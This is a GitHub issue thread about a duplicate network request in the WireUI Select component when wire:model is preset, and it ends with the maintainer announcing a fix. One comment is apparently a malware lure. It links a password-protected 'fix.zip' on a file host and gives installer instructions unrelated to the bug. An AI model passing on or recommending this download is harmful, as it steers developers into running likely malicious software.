### ISSUE TITLE
Select Component: Duplicate Request when a wire:model is initially set

### ISSUE THREAD

**Issue by raymadrona** [PH7-Jack/livewire-ui#950]
**Describe the bug**

When using the `Select` component with `async-data` and an initial `wire:model` value, a duplicate request is triggered to fetch the selected option.

**To Reproduce**

1. Clone this repo: https://github.com/raymadrona/wireui-async-search
2. Run `composer install`
3. Run `php artisan serve` then visit the provided URL
4. Open Developer Tools then network request, reload when needed

**Expected behavior**
Only a single request should be triggered.

**Screenshots or Videos**
![image](https://github.com/user-attachments/assets/161b5d4b-7db5-4516-8b06-e20d626ddb2e)

**Dependencies**
 - WireUI Version: 2.05
 - Laravel Version: 11.21.0
 - Livewire Version: 3.5
 - Lang: en_US

**Desktop (If applicable, please complete the following information):**
 - OS: Windows 10
 - Browser: Chrome
 - Version:  128.0.6613.84

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ph7jack** [comment]
Hi @raymadrona,

Thank you for reporting this issue! I’m pleased to let you know that it has been fixed and the update will be released in just a few hours.

Also, I wanted to express my appreciation for the “How to” guide you created—it made understanding and addressing the issue much easier. Your effort really makes a difference!

Best regards,
Pedro

**Comment by raymadrona** [comment]
Thanks for the fix and for the awesome work on this new version.
